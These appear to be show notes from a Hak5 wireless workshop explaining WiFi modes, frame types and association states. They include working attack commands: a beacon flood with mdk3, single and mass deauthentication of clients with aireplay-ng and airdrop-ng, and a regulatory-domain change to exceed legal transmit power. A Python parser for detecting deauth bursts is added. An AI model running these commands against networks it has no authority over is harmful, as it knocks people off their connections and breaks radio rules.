Hosted by Darren Kitchen and Shannon Morse. New episodes Tuesdays.
Put together by a band of IT ninjas, security professionals and hardcore gamers, Hak5 isn't your typical tech show. We take on hacking in the old-school sense, covering everything from network security, open source and forensics, to DIY modding and the homebrew scene. Then we wrap it all up with a...
This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.
6 Modes of WiFi
---------------
Master - Access Point or Base Station
Managed - Infrastructure Mode (Client)
Demo: Managed
-------------
iwconfig wlan0 mode managed
iwconfig wlan0 essid pineapple
iwconfig wlan0
*more on associations soon
Ad-Hoc - peer to peer
Demo: Ad-Hoc
------------
iwconfig wlan0 channel 1 essid myadhocnetwork mode ad-hoc
Mesh - Mesh Cloud/Network. Planned Ad-hoc
Repeater - Range Extender
Monitor (RFMON)
Demo: Monitor Mode
------------------
airmon-ng start wlan2
tshark -i mon0
Modes and your NIC
------------------
Not all wireless NICs are made the same.
Depending on chipset and other factors your adapter may not support all 6 modes.
Demo: Determine your NIC's available modes
------------------------------------------
airmon-ng # find phy#
iw phy phy1 info | grep -A8 modes
A Word On Transmit Power
------------------------
Like channels, transmit power, or txpower, is regulated by country.
In the US, txpower has a max of 500 milliwatts, or 20 dBm
This is hard-coded into the Linux kernel (though it can be changed)
Easier than changing the kernel is to move to a country with nicer laws
Demo: Moving to Bolivia
-----------------------
iw reg get
iw reg set BO
iwconfig wlan2 txpower 30
3 States of WiFi
----------------
State 1: Unauthenticated and Unassociated
State 2: Authenticated but Unassociated
State 3: Authenticated and Associated
WiFi Frames
-----------
Frames: Simply Data Packets
Typically made up of: Header, Payload, Integrity Check (CRC)
Frame Header:
Source and Destination
Ether Type (What Protocol)
Frame Check Sequence:
CRC
Say that again?
WiFi Frames:
Management Frames
Control Frames
Data Frames
Management Frames:
Beacons
Probes
Authentications
Associations
Beacons:
Advertise the network
Specify SSID (network name), Channels and other capabilities
Demo: Beacon Flood Attack
-------------------------
airmon-ng start wlan2
mdk3 mon0 b -f ssidlist.txt
Demo: Analyze Beacon Frame
--------------------------
gksudo wireshark & disown
wlan.fc.subtype == 0x08
# IEEE 802.11 Beacon Frame > Frame Control > Type Management > Subtype 8
# IEEE 802.11 Management Frame > Tagged parameters
Probe Frame:
Probe Request - Are you my friend?
Probe Response
- Includes capability info
Demo: Is that a probe in your pocket or are you just happy to see me?
---------------------------------------------------------------------
# Look what's coming out of everyone's devices!
airmon-ng start wlan2
airodump-ng mon0
Authentication:
Authentication
- Open, WEP (Shared), WPA, WPA2, WPA-Radius
Deauthentication
Association:
Association Request - Can we be friends?
Association Response
Disassociation
Demo: Analyze Connection to Open AP
-----------------------------------
# start wireshark on wlan2
# Silence the noise!
wlan.addr == 00:c0:ca:54:51:ef and not wlan.fc.subtype == 0x08
# Passive Scan should not generate any frames
iw dev wlan2 scan passive | grep SSID
# Active Scan
iw wlan2 scan | grep SSID
Display only REQUESTS by updating wireshark filter to include "and wlan.fc.subtype == 0x04"
Display only RESPONSES by changing 0x04 to 0x05
airmon-ng start wlan2
airodump-ng mon0
# find channel for AP "pineapple"
iwconfig wlan2 channel 11
iwconfig mon0 channel 11
iwconfig wlan2 | grep Frequency
gksudo wireshark & disown
# Filter for just pineapple and not beacons
wlan.addr == 00:C0:CA:60:53:2E and not wlan.fc.subtype == 0x08
# Associate
# Filter for just phone and pineapple
wlan.addr == 00:C0:CA:60:53:2E and wlan.addr == a0:0b:ba:ba:6a:ca
# Probe Request SSID=Broadcast = null probe request
Deauthentication
----------------
Remember trust?
Demo: Deauthenticate my phone!
------------------------------
iwconfig mon0 channel 11
aireplay-ng -0 10 -a 00:C0:CA:60:53:2E -c A0:0B:BA:BA:6A:CA mon0
Demo: Hella Deauthentication with Airdrop-ng
--------------------------------------------
# Begin demo connected to anything but pineapple
airodump-ng --output-format csv --write /root/dump.csv mon0
airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules
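To make the frame-level demos above concrete (the wlan.fc.subtype filters, the SSID in a beacon's tagged parameters, the null probe request, and the deauth bursts that aireplay-ng -0 produces), here is a small added Python parser that is not part of the show notes. It assumes the 3-address management-frame header, builds its own constructed sample frames, and counts deauthentication frames per transmitter, which is the basic signal a wireless IDS uses to spot a deauth attack.

```python
import struct

# Management subtypes, matching the wlan.fc.subtype values used in the Wireshark filters above
MGMT_SUBTYPES = {0x0: "assoc-req", 0x1: "assoc-resp", 0x4: "probe-req", 0x5: "probe-resp",
                 0x8: "beacon", 0xa: "disassoc", 0xb: "auth", 0xc: "deauth"}
FRAME_TYPES = ("mgmt", "ctrl", "data", "ext")
# Fixed fields between the 24-byte header and the tagged parameters, for subtypes that carry an SSID
FIXED_LEN = {0x8: 12, 0x5: 12, 0x4: 0}  # beacon/probe-resp: timestamp+interval+capab; probe-req: none

def mac(six: bytes) -> str:
    return ":".join("%02x" % b for b in six)

def ssid_element(tagged: bytes):
    """Walk the tagged parameters (ID, length, value) and return the SSID (tag 0), if present."""
    i = 0
    while i + 2 <= len(tagged):
        tag, length = tagged[i], tagged[i + 1]
        if tag == 0:
            return tagged[i + 2:i + 2 + length].decode("utf-8", "replace")
        i += 2 + length
    return None

def parse_frame(raw: bytes) -> dict:
    """Decode the frame control word, the three addresses and (for mgmt frames) the SSID."""
    fc = struct.unpack_from("<H", raw, 0)[0]          # frame control is little-endian on the wire
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF  # bits 2-3 = type, bits 4-7 = subtype
    info = {"type": FRAME_TYPES[ftype], "subtype": subtype,
            "addr1": mac(raw[4:10]), "addr2": mac(raw[10:16]), "addr3": mac(raw[16:22])}
    if ftype == 0:
        info["name"] = MGMT_SUBTYPES.get(subtype, "mgmt-0x%x" % subtype)
        if subtype in FIXED_LEN:
            ssid = ssid_element(raw[24 + FIXED_LEN[subtype]:])
            info["ssid"] = ssid
            # An empty SSID element in a probe request is the "null" / broadcast probe noted above
            info["null_probe"] = (subtype == 0x4 and ssid == "")
    return info

def build_mgmt(subtype: int, dst: str, src: str, bssid: str, ssid=None) -> bytes:
    """Constructed sample frame: 24-byte header, zeroed fixed fields, optional SSID element."""
    hdr = struct.pack("<H", subtype << 4) + b"\x00\x00"  # type 0 (mgmt), duration 0
    hdr += b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid)) + b"\x00\x00"
    body = b"\x00" * FIXED_LEN.get(subtype, 0)
    if ssid is not None:
        body += bytes([0, len(ssid)]) + ssid.encode()
    return hdr + body

def deauth_sources(frames) -> dict:
    """Count deauth frames per transmitter; a burst from one address is the aireplay-ng -0 pattern."""
    counts = {}
    for p in map(parse_frame, frames):
        if p["type"] == "mgmt" and p["subtype"] == 0xc:
            counts[p["addr2"]] = counts.get(p["addr2"], 0) + 1
    return counts
```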
Control Frames:
---------------
Request to Send - RTS: Can I speak?
Clear to Send - CTS: Sure! Everyone else shut up.
Acknowledgement - ACK: Cool, I got what you said ok.
Data Frames:
------------
Kittens!